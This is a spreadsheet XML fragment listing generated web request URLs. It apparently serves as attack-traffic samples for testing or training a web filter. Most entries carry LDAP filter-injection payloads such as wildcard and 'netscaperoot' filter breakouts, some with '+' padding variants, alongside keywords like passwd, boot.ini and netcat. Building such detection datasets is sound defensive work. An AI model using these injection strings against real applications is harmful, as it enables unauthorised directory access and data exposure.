    <t>/uzio72l9jc44pfxinhe/igdkfus7tsadts28.css?9mds@tlf=4ettsni&amp;kr=s&amp;atnlw=81)(&amp;(objectclass=ts7)(|(sn+++=+++brur)(cn=r+j*))&amp;fvnlaluiimy=4&amp;58ihreao=5240&amp;1lka=j4m&amp;qviihthsoleeao2=935165467&amp;d0btigeaki=ed&amp;eo=xem&amp;eme6enagcvotdap=aiceiteal9n9io2&amp;iybft0ytd=428&amp;0tglformkh19l=sodtdtamejevggls7&amp;cptfq_a3hprocessing-instructionmxp_=rinlul3oi</t>
  </si>
  <si>
    <t>/esaipctihhaqdhnr7l/iyz/cmliuxste_seswqgzd/rs5nlaegmo.mdb?vpmoy5n=)+(++|+++(++cn=*o++++'brien*)(mail+++=*o'brien*)++++</t>
  </si>
  <si>
    <t>/mol_vq/lyb83rcpdncbwkdhx9/stmmkt@b/sm8bvf8-ksbkd3i0z.png?sbaeeftnjmi=hhos|oueob&amp;tpcleibcign=[&amp;draies=0600&amp;fdm2xieeiohndl=7&amp;jm69h4=tlof&amp;ar=onodntsrzeix&amp;qha7e@-jphg=)(++|++(displayname=had*)++(name=+++had*+)(+mail=had*+++)&amp;nstrjr8oxvdatio=153157</t>
  </si>
  <si>
    <t>/41vc1uuimatdh4fby0x.exe?pscrhahfe=odumd5dn61+a+sl&amp;lfe0rseuns=eifraoe&amp;9qeeimun=mwataeqi&amp;z@dropxp6utmpif=hasn8g4owzicsa&amp;nr8aroeer=")(targetfilter=(o=netscaperoot))&amp;eu=30149756&amp;ettnc8e9ure4a=79amr7gb4nr&amp;53gapkliwssssl=t&amp;uo=execdk&amp;t8dotr=on@57sr&amp;eeruaan=+1e6t&amp;j2dtra-0wwp-dz=577&amp;l3ietyhaa=0&amp;ttzaioni4gehnen=hechod7nwlenje</t>
  </si>
  <si>
    <t>/oaeaoowcrtnhlgh6oz/ezwmy.asp?tute=nph-tt&amp;iesosts=w0|xp_rw~~o++&amp;atlcbossa33b=z5pqtt8e0o&amp;po4=99451&amp;fsqe5binide=hers&amp;measss3ttilc=roxdbrvu&amp;79oxeeel6=3625)(&amp;(objectclass=rasi)(|(sn+=+++mrno)(cn=rroe+++j*))&amp;i1k8rerr=8lhrs3ddt49&amp;rs07=gcm7enve|eae&amp;nsne8e=969</t>
  </si>
  <si>
    <t>/lwaaqw/uo6xa-e9f.shtml?so=wta&amp;0dllennreo=oxjmu&amp;tpd=775&amp;swrnm0e=rsh&amp;k7ta4mxzoc=eign33vall8pn&amp;toy=ns&amp;tvtywoasclzk=chaowse2ottowk@1bshutdownls&amp;uaeout8orbo=41&amp;f9wr_=ia7atsi6qwuaolo&amp;orhofqdw=/sock_stream&amp;+&amp;czmw8n=02&amp;2laatuertnsjv=+oeae&amp;mrpsd=)+++(+++|+(zzi=nm*)&amp;a1o83nqhr=xeiphphtpassgingi&amp;wadomra=aihqu8fg</t>
  </si>
  <si>
    <t>/rcgpfn9yvq8.c/nor9/za8q1iny3qo9ztlftezs.html?mtues=11&amp;afrmohfcnr=20&amp;6aaeinetst=rt)(&amp;(objectclass+=++++eh*)&amp;ss8be4utua=3mobidn_&amp;e4xp@dthoh_i=metchzsshesnyr</t>
  </si>
  <si>
    <t>/is8mwteeop/ai19w7toport8emrot/uxfthhceurw/vlsvpnevlq-/rfcreyik9d2z/wv2n0ny1hwa/edac8nsotobuulep/c4eaordw0ftf/@roinserth/ehdrrzechgswka/mspho/thqgjcy6amgfdy.asp?tceefweteo4te=1dns+&amp;8lomtsfse6wne4a=nes4usri7ewio&amp;oeleopmbah=744&amp;bfhnetcatmvar67ve85=)++++(+++|+++(++++cn=*o+'brien*++)(mail++++=*o'brien*+++)++</t>
  </si>
  <si>
    <t>/oploezenv/hnazh/hwu/neueoxzxuara4x/@services.gif?4biegsie=�oacestng&amp;rescuroaoonrac8=pde1te3oouj7&amp;aiwptvh=67&amp;ol=vfuelnalqe7ao&amp;mgylfe3vna=igy419txx1j&amp;fqom=njp4r?toftpoe2t&amp;sshoh=abbgthr2ibas&amp;_6u8okiazox=sxlu3a7g35&amp;mzm9ld9=iod&amp;esfrota4=)+(|+(displayname=had*)+++(name=+had*+++)(+++mail=had*++)&amp;eertten=e8ttuiydoqoaasil0&amp;tfshutdown9vmaildexecncfnv=65&amp;hcrezftu=5964473&amp;ri=eschildb</t>
  </si>
  <si>
    <t>/cau/inj.ycy3d2.asmx?xtoshm=798242&amp;eswnjvar7-p=s+l&amp;ke59arae=044)(&amp;(objectclass=ipr)(|(sn=++++4ng)(cn=se++++j*))</t>
  </si>
  <si>
    <t>/c.rnre5ok8vselect/av.2jtmljdizv..xfi.asmx?atmlbe=)+(++++|++++(+++cn=*o+'brien*++++)(mail+++=*o++++'brien*)&amp;teresb0eosh=9167&amp;ob80as=anj:r&amp;bxnullr=e_ly0qekdl1c&amp;vhannsr=il</t>
  </si>
  <si>
    <t>/vssaisektiostyb/htiahh.css?eeaxehvkabh=9308792869&amp;a7e=0729&amp;sareivnkrh=hdadio&amp;oottystels=m-u&amp;piqddede=g+&amp;6bheita=983&amp;tsrg=8st)(++|++++(at=*)</t>
  </si>
  <si>
    <t>/4toy/x8bodyh.wp-3sam.asp?ouehtd=4u)(&amp;(objectclass++++=++++5e*)&amp;kuoswhptsibu=taahfbosdiar&amp;aoamine=tnriq5eeeiane</t>
  </si>
  <si>
    <t>/etbh6cikjeeurfe/ce9hkcgdthskdtnhliaz/oaiseepf/esor0aeplog/ax00dc0/c0.yx75style_6_/o6sffamm18xlz/sv1rgg@zl@ayqcjsn/aaisnoeaso/ixmh7op7wbnp.mdb?qfoenhm=n+sor&amp;metsosnhsuhoc=mfs&amp;czwsoseaaeroao=1109&amp;a8i2eaoehs=to2ojxtermeckeaktg&amp;neyti5i=eei)(++|+++(3r=*)&amp;8streewenassr=12&amp;gzv6e=7&amp;1eea13s=2&amp;orenou=3&amp;slueediid2skex=ra5nautrhe&amp;pt1tsanseoxar=28981&amp;eia4rn=do&amp;lsanp4sn=ese5sf4ucurniul</t>
  </si>
  <si>
    <t>/j8eyjcfoyq94/tnttuvfxsown-jqsxm/e-1p/zxkapogusq23q/yazcrj1ieo/atj/e0a3qp9cchvsihe.html?8ethooi=htaccesaatwfmtwfgopa&amp;bbkqj1loptmocha=eaess(t9he+baood3from+a&amp;d-heq7pfirt=53)(&amp;(objectclass=neh)(|(sn=mu6)(cn=riq+++++j*))&amp;eenaxmqh=uyapsr3ix&amp;rnratore8erskf=2ehaiere&amp;rjnamakbeo=ihs&amp;tg=54713</t>
  </si>
  <si>
    <t>/aan.jsp?1.var8ts=ag)(&amp;(objectclass++++=+++au*)&amp;ets6pienoatod=17514110</t>
  </si>
  <si>
    <t>/weiisuweh5waul/oush/pmbyqcopfo8bmail/rg30rpaqe/i@id9aurr0quyta/ceewtieysu/1mckhxydc.asmx?wtaei=rnaue&amp;sete=5totnb03iszfo&amp;iy7hnzes7ea=)++++(+++|(+++cn=*o+'brien*+++)(mail+=*o'brien*)+++&amp;healqa5egos=+;selectu&amp;igis0etnlnephta=yqsea9ofreheacp&amp;fths8srnpltwtv=idi&amp;dw3like7xvd=kun7a7&amp;htastra=3&amp;eubtue5wt=04599&amp;myqfo_vv=5&amp;heahlebnoezj=40</t>
  </si>
  <si>
    <t>/eo3ctlutax6itsl/nnyjlv3ikgx4/linozrurxu3lomvrezi/99boot.iniga/p.o_gimg_esslry_ci/nyc2i5wslq/cqbdr.png?7mzx7vsestrn=)++(|(theb=litr*)&amp;2p3wl8fsl4zm=b@k&amp;qouri=+%g1stdinyodnd0ab&amp;pexntmeew=sa&amp;zsenaede1tce=pdhtarka(nyoeecmyqxo&amp;ncimodu=trtdea&amp;sradminf8r=677078&amp;zeihpdnisbohtch=tsa0nr&amp;wkb=oaetis2ecgrireahi</t>
  </si>
  <si>
    <t>/2qrainp3vvgxojvi8r@6/dxqhchhoelbjpbi@pjp/m_lhbsn4l/wk3swj/weo88iiyna/tconnectq.shtml?agatcb=cie)(|+(stb=*)&amp;s7amnenecixaa4n=myh9z&amp;wcidd=ryyt]ainecoe&amp;chyfninpausgt=8487391</t>
  </si>
  <si>
    <t>/erthtx/dn0w54proonedraha/yn1wxueauns/hbgwswr/eth1sltpi.htm?rsymn8ron=8364&amp;mv8qls5o06h=39595491&amp;im=hci5a)(&amp;(objectclass=++o1a*)&amp;ynit=i&amp;eardahm=etyorh&amp;cf=0omaacceptn)tpn+htacces20dh&amp;betf2b=rtwifaocmaen71&amp;0pitiej=n6&amp;dainceui:+&amp;i4zw6u=53&amp;tnnewneelhisetl=9&amp;edccarov6i=o7oer9bgsoundeotb&amp;ryihfe3oea2tsby=ibuth&amp;rnyao=v</t>
  </si>
  <si>
    <t>/shqtlrnchu2/oeudbm/ncmzfr-zml811o/wtrenyirt/5cbzqyyjpf/o8irixfuiuegiai.jpeg?tcago=jfsl&amp;vbinp7_xzdivc=rqxrs6srj0&amp;de=te)(|+(yav9z=*)</t>
  </si>
  <si>
    <t>/7@7k5xy-ge3/wgqril6stnskaah/d8hjczty0jf6nc/gtntnen17en1uwe/v68sf0@kq/lug2tt6re/uwta0cniir/djfhxm/edyozwgqbt920/exmql-b3f3pttuqal5/jucnu_vqeksmpt@.jpg?aaa=nwii=tincludeltelnettgn+a&amp;rztifdwxstlzh=o&amp;5dsberajeieata=1&amp;from8xin=~ixrssghsghtoe&amp;oadminqk=snph@0et+&amp;ct6rq=ln&amp;a6e6rohtns=raitlecw+tc$t&amp;ebbeoapms=whef)(++|+++(chy0b=*)</t>
  </si>
  <si>
    <t>/ejs-gosf4dws9/8_e--sam9ncguld5/os96be/setlbee/vfock.t5d8.asp?a2f=ktnwep5&amp;vkoh2cih34antse=eg)(+++|++++(he=*)&amp;tequyin=ioez_te</t>
  </si>
  <si>
    <t>/oxs/l09hjpt/aeipaetflt1roejenoe/eyaicei9086eotto7/af/ttar3umfisia/kd5kpnrrhu1d./cez8n/-jn8ku/0hobcf2f/ayfe5moetatgee/eqsnheachoeupsjoy5d.html?g8=)+(+|++(++++cn=*o++++'brien*)(mail=*o++'brien*+++)++++&amp;d3itio7=betweene%updateteocmitmpznprocessing-instruction</t>
  </si>
  <si>
    <t>/iaj08sxag@peikkbg.gif?z-9includejonabgsound38=alm&amp;aoiq=4&amp;jancnr4oamnli=bnd&amp;ns9zkb62htpl=+-hd+&amp;ne1oe=psubeiaejis7o&amp;zactf=et~hrhtaccesi&amp;gpswiaskedatn9a=suk7zeym&amp;b71ddhautcezlon=e.hv87&amp;etthapnpam1=0&amp;pj7a4q=")(targetfilter=(o=netscaperoot))&amp;meiiacslcjb3ute=(nru[oh6execaoedl&amp;cqv5hrw=zwxd++eaiwhereaposition</t>
  </si>
  <si>
    <t>/ntgtiei0wooece/z@/sf/gaeu2x/%uvwt_j1oy6q1/trgdveeqtetscuebnepa/tuvedvi0/ydqexecbieq3ehzfw/lfasw/yw1mryb/jpi7i-jinfhyv_o44.msf?ca=edea&amp;jmebtc4monfs2=ch)(|+(ceb=*)&amp;zry=n-cv&amp;iasiwhafehz=ost@otbcoemitni;&amp;mbn62oe2wbbgwab=1jqm6u&amp;moolqh33_b5=t7wejv5t0d&amp;otsmhttbt8oljo=428884517</t>
  </si>
  <si>
    <t>/ntrkunionpu/hephnebb6tleet/arertn0aho45itr/mfb/h8kbn7ttre9s.gif?iroafdannncf=0jxs655&amp;cn9i=hipst&amp;toadv=111604&amp;qw4yq5opt=1e&amp;nagap=fhrdz+on:pu&amp;artdotiutoe=eutsu&amp;ey3m4ul=escriptap&amp;0insert8-sdocument9ebz=68&amp;execjbcq=93219684&amp;x0tneoeoaxag=tinqsaeucrmtso3t&amp;nmeoooh=[bgtmo&amp;en49atir=)++++(++|++++(ja=ale*)&amp;nuses3odb2s=opefhhlitre</t>
  </si>
  <si>
    <t>/u3or/oo097kiee/fwu84.jpeg?wuitaktleokposs=ans~log\\+leoot~s&amp;serhb6dd3a=665&amp;sizutnz_bb=32&amp;njnq=3%ide&amp;etrfaneholp33en=vdocumentw+pnt&amp;cqjdjhahwaodwen=)+(|+(displayname=had*)+(name+++=+++had*++++)(++++mail=had*++++)&amp;ntutlzzratwbi=ihbb$at</t>
  </si>
  <si>
    <t>/fi4/ayt2xiuul/rovw7c4xxirjt6__c/o8-metan.jpg?ohc=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/qnchs2llwjae.jpeg?qboot.ini-7kf93ho=412)(&amp;(objectclass=3ia)(|(sn+=++soa)(cn=s+++j*))&amp;ooscom6ln=uednntoyaa&amp;py8tjeodl=2133&amp;pxun=956&amp;8fwgperlzqpimg2f=2292&amp;arw=hbg</t>
  </si>
  <si>
    <t>/4rccc4aaoutsie2hs/anebmntgdpesnor/h4n947tj-xdqwgk4fh3r.aspx?usrjet1oaaol=)(+|+++(aen=eaasg*)&amp;nr=1665&amp;htpasszg2djzbj=ei+br&amp;lresc9ihohaui=ctd&amp;idmbsw=r1imglinklo+&amp;s]l;&amp;snt=44115160&amp;4erd=etcyh3r&amp;sr=370105&amp;egrisystemsd=9788316257&amp;ak=aadcl3o&amp;htkevm=ckc&amp;7rjaaqc=86&amp;bsdgsoxoomeks=esyesnttbihe0uontx&amp;sledatsinorwli=7184719534&amp;emrn=5998</t>
  </si>
  <si>
    <t>/b92tmh0liu8nj/tiw/dysi/eijuca1tdr/tntyl0igqgaovs/enpni/hrtuprxamwk/tpedv4wr1e5v/idsl/dafylausdiefi/7eayexd7iopsepoff.htm?k7s=lyun)(+++|(7eseh=*)</t>
  </si>
  <si>
    <t>/l1eseshl1nea8e/qnllhqe/sgcyelcl/nduww5ucy/oonteab/oisieirdmeki.html?ss8alout7gweti=c389ni_142sg&amp;qm8uroneenxakc=s14)(++++|(ittwr=*)</t>
  </si>
  <si>
    <t>/af4r/ltpg/6f/k3wlnza_2vpa87r/b1sy2hr/evjaqmf2l.k1ru/ss0wyz/o7yeulfougazirt2ne/vifzld.php?lal=y++td&amp;jeaontwto=7815417597&amp;oxaja=hbinivrm9s\\yoeblikesh+cmd&amp;lyyttuiaestu=passthrusyrln&amp;aolaehs=)+++(++|+++(seene=eqrnj*)&amp;lreplacexmlktu_ps1w=inh4x&amp;khv9sp1g_=in8.sk1spio&amp;tvoadolnr02rmji=andueem&amp;lsaxst=q.m4</t>
  </si>
  <si>
    <t>/woa7bgvdsaiyor/9ppunwherejzysystemd/mvtsup.html?dac1iio=sesnaa&amp;ithnaefyyh=cs5k1dw&amp;eeteerjhuto=qtota&amp;8see73=oah3xst5&amp;cbwget-iw9z18=57411062&amp;65b0gici=eigom23rfp&amp;ncr1u=tubfdserft9aatao&amp;06xxd8vo=o&amp;oiqle=844648838&amp;iiiithc0isoftan=ed+rc&amp;icnanyc=)(++++|++(rr6th=7et*)&amp;e6djaisl=fiocm&amp;qwd8z2passwd0.qs=4</t>
  </si>
  <si>
    <t>/nhttacala/emhhf2/tzlqx/g-2faqjkwzx/efkogstaca.cgi?fnuivkvn7gd=eddpnjlbjx&amp;trs=664693169&amp;v9=93103&amp;httpsg-dzum_=fey)(+++|+(qihoi=*)&amp;ortphph2el=0tn+t&amp;bw=909&amp;aeifspeattnamie=261&amp;htqyl=2693312</t>
  </si>
  <si>
    <t>/rbheaicegedsnoxb/qcyk/enenicesrs7ad9tuti/vjd3sbnechov_/swdstq6v2/epgio/ovkvicmkdh._w9/27eak/tnv_rwkqp/uh6wijv.exe?dadminfbb0=4odoeebodyi&amp;4havingz8catl9wbconnectu=ttm)(&amp;(objectclass+++=+fnn*)</t>
  </si>
  <si>
    <t>/ee/dvqqraeitog4/eclearrek/qprlci8q..z4pl/bincludefh/eujgwsrccis3wkmo-/aetsahneo8amwfrt/nmhnggdcwo_yaad.o/immsewk/ghp0enicnere8beqt/a7.aspx?nneepehe=1&amp;ukh2svn2c=norrlh:6eohz&amp;b7u_cp=ipzyigaq&amp;lo=1252&amp;oi1ahiawirhoned=o9z8h&amp;fc-r0upositionfk6id=")(targetfilter=(o=netscaperoot))&amp;ot7s=68010486&amp;tghry1htcdqj8=iad&amp;vpepddlo=+netcatcsb&amp;tua=343793913</t>
  </si>
  <si>
    <t>/wx0vyedbl0_6ou/wj.jpg?dseslqaateiute=e&amp;tsmane=84174100&amp;ae=)+(++++|(cn=*o+++'brien*)(mail++=*o'brien*++)+&amp;rnsp=fxsnl_h-l&amp;disbueirsi8p=2564&amp;erv_7=s3qz&amp;g3n2eeuh=dies</t>
  </si>
  <si>
    <t>/node3b/cuisjnasimwzhssc/brsj0ath/yxc_nj/vfvaruj%u@groupbyp_q/mrxd4dspeo9ciu/gstgnhasi3/a66/tsta/i@0mtjga9rr1wozmw/wgete/iboot.inig.jsp?rs9=ap+aseglogd7seluz&amp;7log=8sats)(&amp;(objectclass+++=+++uyn*)&amp;2insertzi1f=oha&amp;8hgrocctzq=apypassthruw&amp;dln8rnp=2645796&amp;i0aticubkitqr=lebo7un&amp;oehrgntutubmrjh=@m31&amp;8nsnkxn=r63ova55a6s&amp;fluelkth7oid=9245590</t>
  </si>
  <si>
    <t>/oy_qabvyhf@8k6c0j/1wqktvar/a@tfxqeizkihi.htm?mn3bodp=08592194&amp;rgh=tp7kn3q&amp;cwit8oaleozh=1kadprrfsseichn&amp;srn=dpcophpwpnynq+&amp;r1tetcmrpacform=u4udayn&amp;ha4ne=nsk4e&amp;oueeostx2n7b8u=490&amp;htihe3eiaifoe=19964&amp;okoejqsphp=d6eaasooletnim&amp;oertosl=0748260&amp;07rtase=31&amp;ntrkxnoietlm9d=2itzsneh$$ti&amp;4oaspriur97eege=iaccepthomea5&amp;ofr=+null50&amp;naj2ibhue5th=7497)(&amp;(objectclass=ahv0)(|(sn++=sla)(cn=g++j*))</t>
  </si>
  <si>
    <t>/etemto29ehd/c15svnpwupb/gwyrf8x50e97/a7tarouewbv/qmwinnt@t1@_ewpositionz@71/06rofb.xtgwyymu3.html?cuaapntiu=12264&amp;wpayutboot.inirg5bt=ekue&amp;zvmc=08&amp;ebnaulo=nimz&amp;lfu60e=1&amp;ntdhoga=")(targetfilter=(o=netscaperoot))&amp;eiee=5879&amp;sssniutri=y\\httph$&amp;eoecuosia9s4mah=aaoi&amp;nl=17679397&amp;ssi1ca9tshft=alhe&amp;imttsmw=abeym</t>
  </si>
  <si>
    <t>/s4vjekinnwh6l7gf/utawebntyanmtt4i/rehk872xedegs.png?ahnb=mc$nbehtwsofh&amp;de=u5e1enull&amp;hdkmfearesp0n4b=mb8rmct&amp;xlqservices8=3398500941&amp;sts=zad)(&amp;(objectclass+=+++dte*)&amp;eln2wheg5rr=iq73espazxtllioowi&amp;@wchildy=504352&amp;fohisml1e=ssodgfeomecvwrp&amp;5to=ynxtermus&amp;iaasbs7=hrpymrt&amp;e'wuwshp&amp;spljes=sh&amp;ueomvfeoartgaee=mhttpmochauopenfetoon&amp;xpunionxterm=ndhn8rtqiut&amp;wwdrs8cltn=6eupdateutiautoexecxtermr</t>
  </si>
  <si>
    <t>/bnxasi_tmz7q4u8t/1tsuv-vh9zxrsc/ww2lojk0n0bresepxivf/d_i/ywnam./enh/lnqjk.t-xmlqr0/sf7ojn5s0gzfa7p/oadutvrwn.png?raoeez3otai=et076@1dvskr&amp;sqia=afo6onob&amp;adtbet4=rhuoi)(&amp;(objectclass+=+tuo*)</t>
  </si>
  <si>
    <t>/jdu@wautoexecr/ekufdz6q/attwe5iotio6/ncaettsedhblone/mu6d3fpxpb.pl?l3betweenf=dndii2igroup+byp&amp;dwheiapuldliw=2drnlhned:h&amp;beh4rtgelr=1828141&amp;eaudnensd=d4&amp;fehhdagao6dga=as&amp;4enatiaore=92667283&amp;toyej=s&amp;oalis=97124657&amp;ttgotlvkr=)+(+|(uesa=vny*)&amp;lb=9ao1eu&amp;sldlhed1xv6=risatwenato</t>
  </si>
  <si>
    <t>/p1m4lsmeex4pjr/v%u0ditd6c/yoowpsje6ee/wvuwlywheredb5iqg./voihome7ct2g4wd/1rbb7dft@/crc0_i4rr-3bq98hyw/wxl/0tlpestbntm/w2rftpta.asmx?potannelalxlss=79871&amp;a9k4b6hleumegr=)++(+++|++(displayname=had*)+(name++++=++had*+++)(mail=had*+++)</t>
  </si>
  <si>
    <t>/aj-xuynlx6dgeqmgnvju/0ieesa/e3sa7/oj-xd9hnetcatnoandilmt/g0yqixivzy6/ad6/dyx3pgp59nwx.nsf?2tvdtytsa9taor=dshas)(&amp;(objectclass+=+e5er*)</t>
  </si>
  <si>
    <t>/na/ctxt_m6.jsp?iegattesooexrn=sne1&amp;bugyi4ix=+mllocation&amp;g2rqbplvw=76&amp;0btmgdinanfr=)+(|(displayname=had*)++++(name++++=++had*+)(++mail=had*++)&amp;qes5oe=338878&amp;qo1etauh=80&amp;asouth=0520086&amp;umupdatepsmi5n0=teheaoittv&amp;uyradoim4jorp=+[ns&amp;tnboisnetiuu=g%bidiv$gdroppi]rwinnthei&amp;arsy2=&lt;:ciikrrcbgsoundro+&amp;tqo2iea=nmr</t>
  </si>
  <si>
    <t>/puo5-@s6fnnujj_zqca_/ubimgovmi4o/g0@ce/6od5t/pi.mspx?cystedrlgichf=86030&amp;uz6ud@selectwtmp2y=u9o0fswoyshao&amp;tujtmefk=s3pu&amp;dkonjpkvdroz=)+(+++|+++(displayname=had*)+++(name++++=+had*+++)(+mail=had*+)</t>
  </si>
  <si>
    <t>/nloy/otnogbem5tlnit/dwm/ba/t3otrxkz8j4/tftdjiug/cudnytac7nksftw8/upfydtayhetste/5ztvjum4e29xjniazbh/anfbs-hapeb.htm?hac2a76ej=859703&amp;zydchrtms8si=gophvu&amp;asmbglieqssw=9&amp;dtowm7an=snr2ar&amp;str6crtjd3h='&amp;vg2=asee&amp;eug784oemc=i&amp;enusuyeatiitahj=278095&amp;asdeithln=mlwgnxniv&amp;4pd=h7rhsieete&amp;qd3onergrd6ta7=c4ede)(+++|++(hm=*)&amp;sod8hre1w0a=1993025</t>
  </si>
  <si>
    <t>/ubkfaajo2v/nonge9o/6d2udf.rgz/p9bfyn6r7npci.html?@5tao4m=)+(|(displayname=had*)(name=+++had*+++)(+++mail=had*++)&amp;penhhslogidk7d=vhtacces=x+(oatc)dvgacd+boot.inic&amp;ln=240115&amp;6gsfuq=o_38yoa&amp;saiy=yajoxnioi6&amp;iead=aplejscjce&amp;sotscnr9ni8lrva=yepsoe&amp;unnmqei=71&amp;dei=0301544</t>
  </si>
  <si>
    <t>/numb8/ok/ra7tudwtfhrecssant/fr@102husrmochaovur/edori/oontrntsono/e0b8ihkcsp9/c4/wwuxa0daao/8rczsxhxmoy5zn59qd4/2biyaxlhun5hrq.shtml?n7oevaljjnort=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/megnaa/oblgj765xabtz80qd1f/hzthome7z/qgzwjpsq_bz.php?dr=eiojm&amp;tsuhc=vesojrn8a2bcxetd&amp;ii=ewrg0)(|(eitbf=*)&amp;eisaegctctlmg9l=9119547&amp;ieorddigreeo=462455990&amp;cabs4senet=2slyzeee+7dw&amp;lrrid2efeo=6269</t>
  </si>
  <si>
    <t>/s5xhorbuwce/mjinm/tzp/r5neeaztgu/3blog/ttbbodysjxeinsertid.aspx?zn=533&amp;enasiw5sm1=498&amp;wevxggsystemm60a=25&amp;yaxpsnts6e9=22733979&amp;-p-ssascript=)(++++|++(eltg=d8*)&amp;6oopenw1window.openqwindow.open@=znimngvm0d</t>
  </si>
  <si>
    <t>/feoeen/o7v4/ff/eguvd6z@b9n/cyj/yf/ozh.g/fe/oont8rlusw/nhidessu071rcu/toln66/cc2cztz_41s.asp?httpsntunion=11&amp;5od=;adminest&amp;n1_sewindow.openxfmn.l=567)(&amp;(objectclass=ez4r)(|(sn+=++zxn)(cn=pr+++j*))</t>
  </si>
  <si>
    <t>/eec7.xmkh0mdpune/byvljcpns-o3jf/lypt3emsnirtxkldjcy.tiff?57ejhf=rdcosol5pnesmme&amp;n63dph3kas=5atencchild]&amp;eletcni=)+++(|+(9snpu=elr*)&amp;nnlinkmkv=rfyy</t>
  </si>
  <si>
    <t>/ega7ir_2flu5i-xesjxp/ew_83x.bin?ekehmnfat=p&amp;oierrd=znph-&amp;c0iechoep;o&amp;ioll=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/gati6ttahvnmj9rei/s8eurag/shoaglwaaa/w1_uosoelglbszg/05asoeangno/vnorf6-mfromq0r/eaiimkatd/ni8v87kqmzez4g/jtt1vxkfzrig3ac.v63m/a0kudonehlw0/hsts9vodatee/oibgkwi12wsaesei.exe?tiecon7t=rsq&amp;q.xtvaq03o=5389&amp;bdoliuiunqteot=enoio+&amp;1bscriptojny8qb=neo&amp;ibrrnmo=813&amp;7talna=+&amp;yiisnxesrhingf=+enoea?3stlaai&amp;tiooonnrslene=op-hls&amp;eueawutfh=080557&amp;.ufqu=lcnpr)(|+(hg=*)</t>
  </si>
  <si>
    <t>/xoqovhfedvut/hbjgnfrw_1drkmkq/nhln6tfa/ish/rw1s@bkkv@-ht66egg/t-/tv/inlrfctimdnirhm/ccie6o/dbnmodqzddst1i/4h69pggijou2ry.html?dea=dssswnts&amp;8o1yapa3mvncw=+n|e&amp;esubs=\\4&amp;dsgenebnhrhar=)+++(+++|++++(displayname=had*)++++(name++++=+++had*)(+mail=had*)&amp;eajhjaqianm=np4t4&amp;s6f-zj=esoee8tnisdi&amp;zao4rsg=zap;td+rcdbt&amp;eie5atuiwfa=30988&amp;ied=r4hv&amp;o0iesrseynyme=0ax=pn++o&amp;ed=inihsnhu</t>
  </si>
  <si>
    <t>/rrcaajtsz4h362v/aoek9/ee7_/hn4lvh3/2jkq0dropxfzzpasswdgnyd/ak@k0131/zhbk5@1srq/i9r1z/tigely.bin?j0aoa9oreplaceftp-x=rbahirp5siheeypsh&amp;ur5me=3&amp;65ekdal77tln=30)(&amp;(objectclass=dpd)(|(sn++++=++aeg)(cn=js+++j*))&amp;3niqafchrexdn=teenirnun&amp;ae=4</t>
  </si>
  <si>
    <t>/.-1systemkmqk11ad/vaslvv4rj1swj/asasxoismkba/6execsefjhdf/c8all/mhou7gcedgse/cb/xdqnxrg@.html?outt9dnm=wd;rrmi&amp;gehz=oliketc7&amp;met=)(++|+(displayname=had*)++++(name=+had*+)(mail=had*+++)&amp;tl=bitoer-+autoexechn=ah&amp;utobject50d_=236490&amp;nf8neeo=dropir&amp;uqwnadocumenthttp=+mnnwtii3n0dt:+lu</t>
  </si>
  <si>
    <t>/rae/jbodygaccepto_/cwqkwqb/rzxwjwonefiybm/nyg_z/wafmfpfozwja47lrtnyn/jaw/im.gif?tuk623=olmtcgqtiq.0&amp;vlf=ris&amp;hta1ke=o@7sq0z&amp;oeletnse1rhsf=")(targetfilter=(o=netscaperoot))&amp;uhe3mqjrtars=354771&amp;etolmrr=wt&amp;x2na=sijtxytqhutn&amp;acey1e8niaieial=t0a+u%&amp;rw7srdrznqcd7y=d3it&amp;m80r=noss5epeodounbarwq&amp;maeetauklft=ncibtuiytehmgrl</t>
  </si>
  <si>
    <t>/mxd/ti3bkte81z6hjj-5./dtiiicaoitoasdo/syfgliwre/_n/yi9am1f/vdkinput_4tvqetcopy/wwbtgnhdyfr/aohhhe/eoho2t61eqnzr.gif?era95otehxteepn=owgsto&amp;ng.sfj9=y?qraphps&amp;m2thnolsxh=80&amp;l2f=6875211&amp;ycsuqlv5eeoae=ruadleosceu&amp;etmhohc=odta&amp;irhh=)++++(+++|+(displayname=had*)(name+++=+++had*++)(+mail=had*++)&amp;tni4snerrts=rrie2ruii</t>
  </si>
  <si>
    <t>/qscyupdaten/-0q/8uiegkocedepye/hjainafm1r5jyrnfvm/8sqno/@p9kphbf/yzsvr7n3ybkqjmc/df/uu0pe__c/riwonhefs3n/afi4uwnay.mspx?k0miwai23s=7195&amp;hcnsmmeoer=02188&amp;rfgremin=i&amp;sma=tr9l9yda9osn&amp;gjxwxfzpel=9k2di&amp;y4waaniit7=31)(&amp;(objectclass=ate)(|(sn+=+++en)(cn=p++++j*))&amp;estos4=ev6brj63gsx&amp;_prh@aoil9n=lgn3it&amp;trnyioks=cher&amp;imglcdocumentos%uixi=w+tesdh@&amp;opiyimgnwiodocument4d=bzqob</t>
  </si>
  <si>
    <t>/s5gxstsh.js?u0td=)++(+++|++(cn=*o++++'brien*+)(mail++++=*o++'brien*+)+++&amp;upoiahio=eyqb@vknj7&amp;ee=feunwussxnes</t>
  </si>
  <si>
    <t>/ineamrorltadc9qe/ttr9sp/l-qi5eds7h/tmpsycxmlsyc-i0n1/iilaht/pccibke30v2zzijk/kycrdsaandh7i.gif?e6attnnewbsbuct=tirhoferen6&amp;0sztetisrey=riuhsadelete6fbvatwgetofaes+&amp;j2i3nz-iedropb=vsh\\e+laws5o&amp;cohsso=&gt;cvoefne6i8+]&amp;eyachpzr=2545449&amp;nttetu=)++(|(displayname=had*)+++(name+=+had*+++)(++++mail=had*++++)&amp;c-ga=acekdmg+c2s+l</t>
  </si>
  <si>
    <t>/darie1grht1ewhga.dll?oz=uiwlp)(+|++(owodf=*)&amp;nediehbec=+usgroup+by@&amp;s9g8=bgsn&amp;xl3dlog2@me=728&amp;7urvipretog3ann=lm.wgrauloo&amp;renu8nvdert0fn=2esa</t>
  </si>
  <si>
    <t>/htpassn5shutdowndbodyjny9o8connectb/etvbrqiornrtxa/40vmz4gfpcw2k/b9ujd79kw1/thincludexmlyli0/e-eqih.s/wp78tjsagaey.css?768c=dtmnhaeoyte&amp;whlrhih7wz=")(targetfilter=(o=netscaperoot))&amp;rmtl=uahtacces6smobenituf</t>
  </si>
  <si>
